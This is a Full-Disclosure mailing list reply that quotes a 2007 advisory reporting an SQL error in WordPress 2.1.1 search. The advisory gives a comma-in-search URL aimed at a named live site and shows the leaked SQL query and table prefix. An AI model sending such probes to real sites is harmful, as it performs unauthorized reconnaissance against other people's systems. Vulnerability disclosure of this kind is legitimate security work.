Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then? On Tue, 27 Feb 2007 21:39:55 +0100 (CET), SaMuschie [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 +--- - -- - | SaMuschie Research Labs proudly presents . . . +--- -- - - | Application: wordpress | Version: = 2.1.1 | Vuln./Exploit Type: SQL-Injection | Status: 0day +- -- - - | Discovered by: Samenspender | Released: 20070227 | SaMuschie Release Number: 2 +--- - -- - Searching for a single ,,comma,, generates a sql error message. e.g.: http://wordpress-deutschland.org/?s=, results in: WordPress Datenbank-Fehler: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DE' at line 1] SELECT SQL_CALC_FOUND_ROWS wpdorg_posts.* FROM wpdorg_posts WHERE 1=1 AND () AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DESC LIMIT 0, 10 +- -- - | Lameness Disclaimer +- - -- - - | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers they don't know the answer ;) +-- - -- - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5GSdMFgfGpQK8VERAvOWAJwLms5H6b4So3tO19lc3eHMGeNvLwCdHAP8 ZfylSi7g8HINHkpBYzYgUqE= =fBdH -END PGP SIGNATURE--- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/